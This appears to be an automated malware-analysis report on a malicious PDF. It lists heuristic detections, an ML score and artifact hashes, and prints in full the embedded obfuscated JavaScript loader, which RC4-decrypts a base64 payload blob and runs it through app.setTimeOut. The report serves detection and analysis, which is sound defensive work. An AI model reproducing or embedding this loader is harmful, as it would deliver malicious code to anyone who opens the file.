MALICIOUS
134
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript stream, named javascript_obj0013_000.js, is obfuscated and likely responsible for executing a malicious payload. The presence of String.fromCharCode further suggests code obfuscation within the JavaScript.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
function kekekesepo(bamofove,kokaponu3){var memakafuki=[],lises1,memam=0,ruvobep,robibatas='',mubava7;for(lises1=0;lises1<256;lises1++){memakafuki[lises1]=lises1;}for(lises1=0;lises1<256;lises1++){memam=(memam+memakafuki[lises1]+bamofove.charCodeAt(lises1%bamofove.length))%256;ruvobep=memakafuki[lises1];memakafuki[lises1]=memakafuki[memam];memakafuki[memam]=ruvobep;}lises1=0;memam=0;for(mubava7=0;mubava7<kokaponu3.length;mubava7++){lises1=(lises1+1)%256;memam=(memam+memakafuki[lises1])%256;ruvob … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_000.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3CE | 5363 bytes |
SHA-256: 06a609efb2022f27ed03d587a92d90dcfbec3c7bb9c32f3a1e799da17429c7d2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 72 of 120 identifiers look randomly generated (e.g. 'd5fd4F50vl3ZD96Rj8rD13TZ6vq4HLaLz1hm4XuT'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function kekekesepo(bamofove,kokaponu3){var memakafuki=[],lises1,memam=0,ruvobep,robibatas='',mubava7;for(lises1=0;lises1<256;lises1++){memakafuki[lises1]=lises1;}for(lises1=0;lises1<256;lises1++){memam=(memam+memakafuki[lises1]+bamofove.charCodeAt(lises1%bamofove.length))%256;ruvobep=memakafuki[lises1];memakafuki[lises1]=memakafuki[memam];memakafuki[memam]=ruvobep;}lises1=0;memam=0;for(mubava7=0;mubava7<kokaponu3.length;mubava7++){lises1=(lises1+1)%256;memam=(memam+memakafuki[lises1])%256;ruvobep=memakafuki[lises1];memakafuki[lises1]=memakafuki[memam];memakafuki[memam]=ruvobep;robibatas+=String.fromCharCode(kokaponu3.charCodeAt(mubava7)^memakafuki[(memakafuki[lises1]+memakafuki[memam])%256]);}return robibatas;}var kevep=app.setTimeOut(kekekesepo(sabavo1("TXF3WjZIZjR2cDBYOVgwR3A5ZDQxMUs5Q3pSMA=="),sabavo1("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")),200);function sabavo1(dasivo9){dasivo9=dasivo9.replace(/[^a-z0-9\+\/=]/ig,'');var kolopor='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',temamitel,kuduv,varuda5,pitokonar,rodapotim,vaven,robevovuf,nolalup7=[],desubakim8,desubakim8=0;while((dasivo9.length%4)!=0){dasivo9+='=';}for(sabuk=0;sabuk<dasivo9.length;sabuk+=4){pitokonar=kolopor.indexOf(dasivo9.charAt(sabuk));rodapotim=kolopor.indexOf(dasivo9.charAt(sabuk+1));vaven=kolopor.indexOf(dasivo9.charAt(sabuk+2));robevovuf=kolopor.indexOf(dasivo9.charAt(sabuk+3));temamitel=(pitokonar<<2)|(rodapotim>>4);kuduv=((rodapotim&15)<<4)|(vaven>>2);varuda5=((vaven&3)<<6)|robevovuf;nolalup7[desubakim8++]=String.fromCharCode(temamitel);if(vaven!=64)nolalup7[desubakim8++]=String.fromCharCode(kuduv);if(robevovuf!=64)nolalup7[desubakim8++]=String.fromCharCode(varuda5);}return nolalup7.join('');}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.